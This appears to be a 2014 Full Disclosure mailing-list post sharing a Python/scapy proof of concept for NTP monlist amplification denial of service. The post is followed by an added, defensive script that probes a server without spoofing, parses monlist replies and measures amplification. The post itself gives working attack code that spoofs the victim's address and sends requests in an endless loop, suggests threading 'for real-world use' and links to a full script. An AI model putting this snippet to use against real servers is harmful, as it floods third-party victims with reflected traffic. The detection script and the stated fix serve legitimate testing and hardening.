[FD] A more robust POC for the ntp amplification dos
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] A more robust POC for the ntp amplification dos
- From: rai@xxxxxxxxxxxxxxx
- Date: Wed, 16 Jul 2014 09:20:00 +0000
Hi,
Even though the ntp amplification attacks are old, and there are
plenty of scripts for checking if vulnerable (e.g. the nmap nse script
ntp-mon), I had trouble finding a good example script that actually
exploited the vuln as would be done in the wild.
Eventually I edited a partially written script written by multiple
authors. Since it is in Python and uses scapy, the key part of the exploit is
as simple as:
from scapy.all import IP, UDP, Raw, send

# Mode 7 (private) request: implementation 3 (XNTPD), request code 42 (MON_GETLIST_1)
data = "\x17\x00\x03\x2a" + "\x00" * 4
...
# Source address spoofed to the target, so the much larger monlist reply lands there
packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data)
send(packet,loop=1)
For real-world use, just add some boilerplate threading to taste:
http://maker.fea.st/ntpamp.py
--
rai
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
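Editor's added example (not the poster's script, nor the linked ntpamp.py): a dependency-free Python check for the weakness the post exploits. It builds the same 8-byte mode 7 MON_GETLIST_1 request as the scapy snippet, parses the mode 7 response header and its 72-byte info_monitor_1 items, and computes the amplification factor (response bytes / request bytes). The response builder and the client list are constructed test data, not a capture; `probe_monlist` sends the request from your own address (no spoofing) and is only run when the script is invoked from the command line with a host argument.

```python
"""NTP mode 7 monlist check: build the request, parse the reply, measure amplification.

Added example; not part of the original post. The sample response below is
constructed, not captured from a real server.
"""
import socket
import struct
import sys

NTP_PORT = 123
MODE7_REQUEST = 0x17        # R=0, M=0, VN=2, mode=7 (private)
IMPL_XNTPD = 3
REQ_MON_GETLIST_1 = 42
MON_ITEM_SIZE = 72          # struct info_monitor_1 (ntp_request.h)
# avg_int, last_int, restr, count, addr, daddr, flags, port, mode, version,
# v6_flag, unused1, addr6, daddr6
MON_ITEM_FMT = "!IIIIIIIHBBII16s16s"


def build_monlist_request(seq=0):
    """8-byte mode 7 header, byte-identical to "\\x17\\x00\\x03\\x2a" + "\\x00"*4."""
    # err(4)|nitems(12) and mbz(4)|size(12) are zero in a request
    return struct.pack("!BBBBHH", MODE7_REQUEST, seq & 0x7F,
                       IMPL_XNTPD, REQ_MON_GETLIST_1, 0, 0)


def parse_mode7_response(pkt):
    """Decode a mode 7 response header and, for monlist replies, its items."""
    if len(pkt) < 8:
        raise ValueError("short packet")
    rm, auth_seq, impl, req, err_nitems, mbz_size = struct.unpack("!BBBBHH", pkt[:8])
    hdr = {
        "response": bool(rm & 0x80), "more": bool(rm & 0x40),
        "version": (rm >> 3) & 0x07, "mode": rm & 0x07, "seq": auth_seq & 0x7F,
        "implementation": impl, "request": req,
        "error": err_nitems >> 12, "nitems": err_nitems & 0x0FFF,
        "item_size": mbz_size & 0x0FFF, "items": [],
    }
    if hdr["mode"] != 7 or not hdr["response"]:
        raise ValueError("not a mode 7 response")
    if hdr["error"]:
        return hdr      # non-zero error: server refused or has no data; no items follow
    off = 8
    for _ in range(hdr["nitems"]):
        chunk = pkt[off:off + hdr["item_size"]]
        if len(chunk) < hdr["item_size"]:
            break       # truncated packet; keep what was parsed
        if hdr["item_size"] == MON_ITEM_SIZE:
            f = struct.unpack(MON_ITEM_FMT, chunk)
            hdr["items"].append({
                "addr": socket.inet_ntoa(struct.pack("!I", f[4])),
                "port": f[7], "count": f[3], "mode": f[8], "version": f[9],
            })
        off += hdr["item_size"]
    return hdr


def amplification_factor(request, responses):
    """Bytes the server sends back per byte the attacker sends (spoofed to the victim)."""
    return sum(len(r) for r in responses) / float(len(request))


def build_sample_response(clients, more=False, seq=0):
    """Constructed monlist reply for testing: clients is [(ip, port, count), ...]."""
    rm = 0x80 | (0x40 if more else 0) | MODE7_REQUEST
    hdr = struct.pack("!BBBBHH", rm, seq & 0x7F, IMPL_XNTPD, REQ_MON_GETLIST_1,
                      len(clients) & 0x0FFF, MON_ITEM_SIZE)
    body = b""
    for ip, port, count in clients:
        addr = struct.unpack("!I", socket.inet_aton(ip))[0]
        body += struct.pack(MON_ITEM_FMT, 2, 1, 0, count, addr, 0, 0, port,
                            3, 4, 0, 0, b"\x00" * 16, b"\x00" * 16)
    return hdr + body


def probe_monlist(host, timeout=2.0, max_packets=100):
    """Send one request from our own address and collect replies until 'more' clears."""
    req = build_monlist_request()
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    responses = []
    try:
        s.sendto(req, (host, NTP_PORT))
        while len(responses) < max_packets:
            data, _ = s.recvfrom(2048)
            responses.append(data)
            if not parse_mode7_response(data)["more"]:
                break
    except socket.timeout:
        pass
    finally:
        s.close()
    return req, responses


if __name__ == "__main__":
    req, resps = probe_monlist(sys.argv[1])
    if not resps or parse_mode7_response(resps[0])["error"]:
        print("monlist not answered: not usable as an amplifier")
    else:
        print("%d packets, amplification x%.1f" % (len(resps), amplification_factor(req, resps)))
```

A server that answers a single 8-byte request with several hundred-byte monlist packets (up to 100 of them) is the amplifier the post targets; a zero-length or error reply means monlist is disabled (`disable monitor` or `restrict ... noquery`), which is the fix on the server side.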